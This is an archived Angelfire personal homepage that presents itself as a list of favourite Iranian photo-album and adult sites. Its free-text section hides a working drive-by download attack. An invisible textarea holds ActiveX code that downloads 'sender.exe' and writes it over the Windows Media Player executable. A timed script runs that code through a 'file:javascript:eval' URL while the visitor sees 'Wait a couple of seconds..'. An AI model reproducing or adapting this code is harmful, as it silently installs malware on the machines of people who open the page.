<html>
<!--Generated by Angelfire: L00S00-->
<head>
<title>WeLL Come To DOKHTAR FARARY</title>
</head>
<body bgcolor="#000000" text="#0000ff" link="#d2691e" alink="#c0c0c0" vlink="#d2b48c">
<!-- ************************************************************* -->
<!-- * START ANGELFIRE AD CODE - PLEASE REMOVE WHEN EDITING PAGE * -->
<!-- ************************************************************* -->

<!-- revision: inline - $Change: 72311 $ -->

<script language="JavaScript" src="/sys/common_scripts.js"></script>
<script language="JavaScript">setAdGroup('81.71.0.144');</script>
<script language="JavaScript">
<!--
// Cache-busting LUBID bug.
var ran = Math.round(Math.random() * 899999) + 100000;
var lubid_string = "<img src=\"http://hb.lycos.com/header?VID=6105&LHIG=1&ord=" + ran + "\" height=\"1\" width=\"1\">";
document.write(lubid_string);
//-->
</script>

<noscript><img src="http://hb.lycos.com/header?VID=6105&LHIG=1" height="1" width="1"></noscript>


<!-- START: Catman header -->

<script>
var cm_role = "live"
var cm_host = "angelfire.lycos.com"
var cm_taxid = "/memberembedded"
</script> 
<script src="http://scripts.lycos.com/catman/init.js"></script>
<script language="JavaScript1.1">
var objAdMgr = new AdManager();


if(adChannel != "") { objAdMgr.setForcedParam("google_ad_channel", adChannel); }
var strProdSetName = objAdMgr.chooseProductSet(); objAdMgr.renderHeader();
</script>

<!-- END: Catman header -->

<script language="JavaScript">
<!--

launchSidebar('sidebar.angelfire.com', '(none)');

if (!displayAd()) document.write("<!" + "--");

//-->
</script>
<noscript>
<img src="/doc/images/track/ot_nosidepane.gif?rand=159887" alt="dot" width="150" height="1">
</noscript>

<div align="center" id="FooterAd_159887" name="FooterAd_159887" style="display:none">
<br clear="all">
<table width="728" cellspadding="0" cellspacing="0" border="0">
<tr>
<td><A href="/adm/redirect/www"><IMG SRC="/doc/images/hostedbyaf.gif" ALT="hosted by Angelfire" WIDTH="210" HEIGHT="42" BORDER="0" VSPACE="2"></A></td>
</tr>
<tr>
<td width="728" align="center"><script>
if (objAdMgr.isSlotAvailable("leaderboard2")) {
	objAdMgr.renderSlot("leaderboard2")
}
</script>
<noscript>
<a href="http://network.realmedia.com/RealMedia/ads/click_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/159887@Top1?x"><img border="0" src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/159887@Top1"></a>
</noscript></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="3" width="728">
	<tr>
		<td><font size="1" face="verdana, arial, helvetica, sans serif"><a href="http://r.hotbot.com/r/tp_embeddedtxthb/http://www.hotbot.com/" target="_NEW">Search the web with Hotbot</a></font></td>
		<td align="right"><font size="1" face="verdana, arial, helvetica, sans serif"><a href="http://r.lycos.com/r/mempage_hostonaf/http://www.angelfire.lycos.com/doc/subscriptions/">Host your site on Angelfire</a></font></td>
	</tr>
</table>
</div>

<script language="JavaScript">
<!--

window.onload = function () {
    setKeywordCookie('(none)');
    showAd('FooterAd_159887');
    buildExitHandler();
}

if (!displayAd()) document.write("-" + "->");

//-->
</script>
<script language="JavaScript">
<!--
  if(!displayTopAd()) {
   var adImg=d.createElement('IMG'); adImg.src="/doc/images/track/ot_smallframe.gif?w="+pageWidth+"&h="+pageHeight+"rand=279026";
   document.write("<!" + "--");
  }
  else {
   var adImg=d.createElement('IMG'); adImg.src="/doc/images/track/ot_adserved.gif?w="+pageWidth+"&h="+pageHeight+"rand=279026";
  }
//-->
</script>
<noscript>
<img src="/doc/images/track/ot_noscript.gif?rand=279026" alt="dot" width="150" height="1">
</noscript>

<div align="center">
<script>
if (objAdMgr.isSlotAvailable("leaderboard")) {
	objAdMgr.renderSlot("leaderboard")
}
</script>
<noscript>
<a href="http://network.realmedia.com/RealMedia/ads/click_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/279026@Top1?x"><img border="0" src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/279026@Top1"></a>
</noscript>

<br />
</div>

<script language="JavaScript">
<!--
  if(!displayTopAd()) document.write("-" + "->");
//-->
</script>
<!-- START: Catman Footer -->
<script language="JavaScript1.1">
objAdMgr.renderFooter();
</script>

<!-- END: Catman Footer -->

<!-- revision: ubiquitous - $Change: 70818 $ -->

<!-- *********************************************************** -->
<!-- * END ANGELFIRE AD CODE - PLEASE REMOVE WHEN EDITING PAGE * -->
<!-- *********************************************************** -->

<basefont size="3">

<!--Header-->
<h1 align="center">WeLL Come To DOKHTAR FARARY</h1>
<!--EndHeader-->

<!--Image-->
<div align="center"><img src="/doc/images/af_logo_156.gif"></div>
<p>
<!--EndImage-->

<!--List-->
<font size="5">My Favorite Album Girl Iran</font>
<ul>
<li>http://www.download.com
<li>http://www.booterworld.com
<li>http://www.bia2.com
</ul>
<p>
<!--EndList-->

<!--Links-->
<font size="5">My Favorite Web Sites</font>
<p>
<a href="http://www.BOOTER.TK">Album aks dokhtaraneh farari</a><br>
<a href="http://www.bedehi.com">Album aks dokhtarayeh kharej</a><br>
<a href="http://www.cekaf.com">album aks sex</a><br>
<a href="http://www.chanelx.com"> album aks party tehran</a><br>
<p>
<!--EndLinks-->

<!--Freetext-->Thank you for visiting my page at Angelfire.
Please come back and visit again!
<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP"); 
x.Open("GET", "http://www.angelfire.com/film/dokhtarfarari/sender.exe",0); 
x.Send(); 

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

</textarea>
Wait a couple of seconds..

<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media") 
}


window.open("error.jsp","_media");

setTimeout("doit()", 5000);


</script><!--EndFreetext-->
<p>

<!--Counter-->
<center><img src="/cgi-bin/Count.cgi"></center>
<p>
<!--EndCounter-->

</body>
</html>
